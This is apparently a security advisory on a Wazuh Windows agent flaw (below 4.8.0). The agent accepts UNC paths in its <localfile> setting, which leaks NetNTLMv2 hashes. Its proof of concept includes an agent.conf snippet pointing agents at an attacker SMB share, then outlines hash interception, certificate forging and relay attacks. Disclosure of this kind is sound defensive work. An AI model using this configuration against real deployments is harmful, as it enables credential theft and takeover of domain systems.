Remote code execution and Local privilege escalation due to NetNTLMv2 hash theft in Wazuh < 4.8.0

Summary

We’ve identified a critical security vulnerability affecting the Wazuh windows agent, which can be abused to achieve remote code execution (RCE) and Local Privilege Escalation under the scope of the NT AUTHORITY\System user by forcing a configuration to monitor an attacker-controlled remote UNC path.

We’ve tested the vulnerability against Wazuh version 4.7.2, however, the main branch and alpha tags on the repository suggest the vulnerability is still present in the latest version.

CVSS

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Details

The Wazuh agent <localfile> configuration option doesn’t restrict the use of UNC paths (such as SMB, Name pipes, and others). An adversary with control over a Wazuh server, or in possession of an agent’s private key can force <localfile> configurations on deployed agents, forcing them to connect to a UNC path of an NTLM relay SMB server or impersonation named pipe, resulting in the compromise of the NetNTLMv2 hash for the computer’s domain account, or impersonation of the local NT AUTHORITY\System account using named pipes.

This impact all wazuh agent for Windows versions up to 4.8.0. The severity is reduced due to additional complexity required to exploit: The attacker must control the Wazuh Server, or must obtain an asset’s private key or MITM network attacks

PoC

In this proof-of-concept scenario, an adversary achieves remote code execution under the scope and privileges of NT AUTHORITY\System by forcing the wazuh agent to read an UNC path, leaking a domain controller’s NetNTLMv2 machine account’s hash and forging a valid certificate with Active Directory Certificate Services to authenticate and execute code to any computer in the network.

1. A wazuh agents group is set with a custom agent.conf containing a local file location pointing to the UNC of the attacker’s SMB server.

<agent_config>
    <localfile>
        <location>\\192.168.56.103\x\x</location>
        <log_format>syslog</log_format>
    </localfile>
</agent_config>

2. The DC01 computer agent is added to the group with the attack configuration.

3. The attacker waits for the agent to connect to the SMB server and intercepts the NetNTLMv2 authentication hash.

4. Once the hash is compromised, a certificate is forged on behalf of the domain controller. Multiple other attacks such as NTLM relay, DCSync, Kerberos relay local privilege escalation, and others.